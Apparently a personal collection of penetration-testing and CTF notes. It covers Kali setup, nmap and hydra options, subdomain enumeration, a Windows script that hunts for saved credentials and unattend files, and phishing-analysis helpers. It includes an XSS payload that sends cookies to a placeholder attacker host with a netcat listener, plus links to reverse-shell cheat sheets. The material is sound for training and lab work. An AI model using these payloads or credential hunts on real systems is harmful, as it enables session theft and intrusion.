https://www.nomoreransom.org/
crypto-sheriff: Identifies the ransomware variant
decryption-tools: Provides downloads of decryption tools
report-a-crime: A collection of links to law enforcement agencies
Start Penguin
Run the following commands
$ sudo apt-get update
$ sudo apt install qemu-kvm libvirt-clients libvirt-daemon-system bridge-utils virtinst libvirt-daemon virt-manager
Go back to Chrome OS's Start button and run "Virtual Machine Manager".
Download the Kali QEMU image to a USB flash drive before plugging the drive into Chrome OS.
#wmic product get name,version,vendor
@echo off
echo(
echo Showing significant files...
IF EXIST "C:\Unattend.xml" (
echo C:\Unattend.xml exists.
)
IF EXIST "C:\Windows\Panther\Unattend.xml" (
echo C:\Windows\Panther\Unattend.xml exists.
)
IF EXIST "C:\Windows\Panther\Unattend\Unattend.xml" (
echo C:\Windows\Panther\Unattend\Unattend.xml exists.
)
IF EXIST "C:\Windows\system32\sysprep.inf" (
echo C:\Windows\system32\sysprep.inf exists.
)
IF EXIST "C:\Windows\system32\sysprep\sysprep.xml" (
echo C:\Windows\system32\sysprep\sysprep.xml exists.
)
IF EXIST "%userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" (
echo %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt exists.
)
IF EXIST "C:\inetpub\wwwroot\web.config" (
echo C:\inetpub\wwwroot\web.config exists.
)
IF EXIST "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config" (
echo C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config exists.
)
echo(
echo Showing saved credentials on the system...
cmdkey /list
echo(
echo Show Putty Proxy passwords...
reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s
#nmap -e tun0 -f -T1 -D 10.10.174.103,RND,10.10.174.104,RND,ME,RND,RND -Pn 10.10.174.2
Use fragmentation (-f), a slow timing template (-T1) and decoy addresses (-D) on the tun0 interface (-e) to scan 10.10.174.2
-l username Provide the login name
-P WordList.txt Specify the password list (e.g. /usr/share/wordlists/rockyou.txt) to use
server service Set the server address and service to attack
-s PORT Use in case of non-default service port number
-V or -vV Show the username and password combinations being tried
-d Display debugging output if the verbose output is not helping
-oN save output in normal format
-oG save output in grepable format
-oX save output in XML format
-oA save output in normal, XML and Grepable formats
Attacker Machine:
# nmap -sT -Pn --script all -p 80 VICTIM_IP_ADDRESS
Victim Machine:
# ncat -l -k -t -p 80
Use Firefox to browse the URL, open "Web Developer Tools", go to "Console" tab, and run the command "jQuery.ui.version".
1. X-Originating-IP - The IP address the email was sent from (an X-header)
2. smtp.mailfrom / header.from - The domains the email was sent from (these values appear inside the Authentication-Results header)
3. Reply-To - The address that replies are delivered to instead of the From address
Reference: https://web.archive.org/web/20221219232959/https://mediatemple.net/community/products/all/204643950/understanding-an-email-header
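An added example (not part of these notes) that pulls the three headers listed above out of a raw message and flags the usual phishing mismatches between them; the sample message, its domains and its IP address are constructed placeholders.

```python
import email.utils
import re
from email import policy

# Constructed sample message (all domains and the IP address are placeholders)
SAMPLE_EMAIL = """\
X-Originating-IP: [203.0.113.45]
Authentication-Results: mx.example.net; spf=fail smtp.mailfrom=mailer.example.org; dkim=none header.from=bank.example.com
From: "Example Bank" <alerts@bank.example.com>
Reply-To: support@mailer.example.org
To: victim@example.net
Subject: Action required

Please confirm your details.
"""

def header_domain(value):
    """Domain part of an address header such as '"Name" <user@host>'."""
    _, addr = email.utils.parseaddr(str(value or ""))
    return addr.rpartition("@")[2].lower()

def first(pattern, text):
    """First regex capture group found in text, or '' when absent."""
    m = re.search(pattern, text)
    return m.group(1) if m else ""

def triage(raw):
    """Extract the three headers and return (fields, warning flags)."""
    msg = email.message_from_string(raw, policy=policy.default)
    auth = str(msg.get("Authentication-Results", ""))
    fields = {
        "x_originating_ip": str(msg.get("X-Originating-IP", "")).strip("[] "),
        "smtp_mailfrom": first(r"smtp\.mailfrom=([^\s;]+)", auth),
        "header_from": first(r"header\.from=([^\s;]+)", auth),
        "from_domain": header_domain(msg.get("From")),
        "reply_to_domain": header_domain(msg.get("Reply-To")),
    }
    flags = []
    if fields["reply_to_domain"] and fields["reply_to_domain"] != fields["from_domain"]:
        flags.append("Reply-To domain differs from From domain")
    if fields["smtp_mailfrom"] and fields["smtp_mailfrom"] != fields["header_from"]:
        flags.append("envelope sender (smtp.mailfrom) differs from header.from")
    if re.search(r"\bspf=fail\b", auth):
        flags.append("SPF check failed")
    return fields, flags

if __name__ == "__main__":
    fields, flags = triage(SAMPLE_EMAIL)
    print(fields)
    print(flags)
```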
[TryHackMe] URL Shortener
Common URL Shorteners are shown as follows.
bit.ly
goo.gl
ow.ly
s.id
smarturl.it
tiny.pl
tinyurl.com
x.co
Append "+" to the shortened URL to see the original URL.
Example:
The URL shown above is adıdas.de (a dotless i in place of the i), whose Punycode form is http://xn--addas-o4a.de/
Tool:
Punycode can be inserted through Microsoft Word.
Punycode translator:
https://www.punycoder.com/
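An added example (not part of these notes, and not the translator site's code) that does the Punycode conversion offline with Python's own codec and flags labels that mix scripts or use non-ASCII Latin look-alikes such as the dotless i in adıdas.de; the script detection approximates the script from the Unicode character name, and the sample hosts are constructed.

```python
import unicodedata

def to_punycode(host):
    """ASCII form of a hostname: every non-ASCII label becomes an xn-- label."""
    labels = []
    for label in host.lower().split("."):
        if label.isascii():
            labels.append(label)
        else:
            labels.append("xn--" + label.encode("punycode").decode("ascii"))
    return ".".join(labels)

def from_punycode(host):
    """Unicode form of a hostname: xn-- labels are decoded, others kept as-is."""
    labels = []
    for label in host.lower().split("."):
        if label.startswith("xn--"):
            labels.append(label[4:].encode("ascii").decode("punycode"))
        else:
            labels.append(label)
    return ".".join(labels)

def scripts_in(label):
    """Scripts used by a label, approximated from the first word of each Unicode name."""
    scripts = set()
    for ch in label:
        if ch.isascii():
            scripts.add("LATIN" if ch.isalpha() else "COMMON")
        else:
            scripts.add(unicodedata.name(ch, "UNKNOWN").split()[0])
    return scripts

def homograph_flags(host):
    """Reasons a hostname deserves a second look: mixed scripts or non-ASCII Latin letters."""
    flags = []
    for label in from_punycode(host).split("."):
        if label.isascii():
            continue
        scripts = scripts_in(label) - {"COMMON"}
        if len(scripts) > 1:
            flags.append(f"{label}: mixes scripts {sorted(scripts)}")
        # Non-ASCII Latin letters (dotless i, accented letters) are the classic look-alikes
        if any(not ch.isascii() and unicodedata.name(ch, "").startswith("LATIN") for ch in label):
            flags.append(f"{label}: non-ASCII Latin letter, resolves as {to_punycode(label)}")
    return flags

# Constructed samples: the adıdas.de example from the notes and a Cyrillic look-alike label
SAMPLE_HOSTS = ["ad\u0131das.de", "xn--addas-o4a.de", "ex\u0430mple.com"]
if __name__ == "__main__":
    for h in SAMPLE_HOSTS:
        print(h, "->", to_punycode(h), from_punycode(h), homograph_flags(h))
```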
https://metadefender.com/
https://talosintelligence.com/
https://www.virustotal.com/gui/home/upload
https://intelligence.any.run/analysis/lookup
https://bazaar.abuse.ch/browse/
https://malshare.com/search.php
PS: Obtain SHA256 under Windows
#CertUtil -hashfile [FILENAME] SHA256
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
https://web.archive.org/web/20200901140719/http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
https://github.com/danielmiessler/SecLists
XSS Payload:
</textarea><script>fetch('http://URL_OR_IP:PORT_NUMBER?cookie=' + btoa(document.cookie) );</script>
Listening side:
#nc -nvlp PORT_NUMBER
# Manually execute "Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope Process"
# Name this file as Listen-TCP.ps1
param (
    [int]$Port = 8080  # Default port is 8080, you can specify another port when running the script
)

$gsock = {
    # Create a TCP listener on the specified port
    $listener = [System.Net.Sockets.TcpListener]$Port
    $listener.Start()
    Write-Host "Listening on port $Port..."
    try {
        while ($true) {
            # Accept a client connection (blocks until a client connects)
            $client = $listener.AcceptTcpClient()
            Write-Host "Client connected!"
            # Get the network stream for reading data
            $stream = $client.GetStream()
            # Set up a reader to read from the stream
            $reader = New-Object System.IO.StreamReader($stream)
            # Read the data from the stream; Peek() returns -1 once no more data is buffered
            while ($reader.Peek() -ge 0) {
                $data = $reader.ReadLine()
                Write-Host "Received: $data"
            }
            # Close the client connection
            $reader.Close()
            $client.Close()
        }
    } catch {
        Write-Host "Error: $_"
    } finally {
        # Stop the listener when done
        $listener.Stop()
        Write-Host "Listener stopped."
    }
}
&$gsock
# .\Listen-TCP.ps1 -Port 9090
1) CA's Certificate Transparency logs
Use https://crt.sh/ to search the domain.
2) Google Hacking
Utilize the keywords, "site" and "inurl".
3) Employing the tool, dnsrecon
# dnsrecon -t brt -d DOMAIN
4) Employing another tool, sublist3r.py
# sublist3r.py -d DOMAIN
5) Virtual host enumeration with ffuf
# ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.DOMAIN" -u http://IP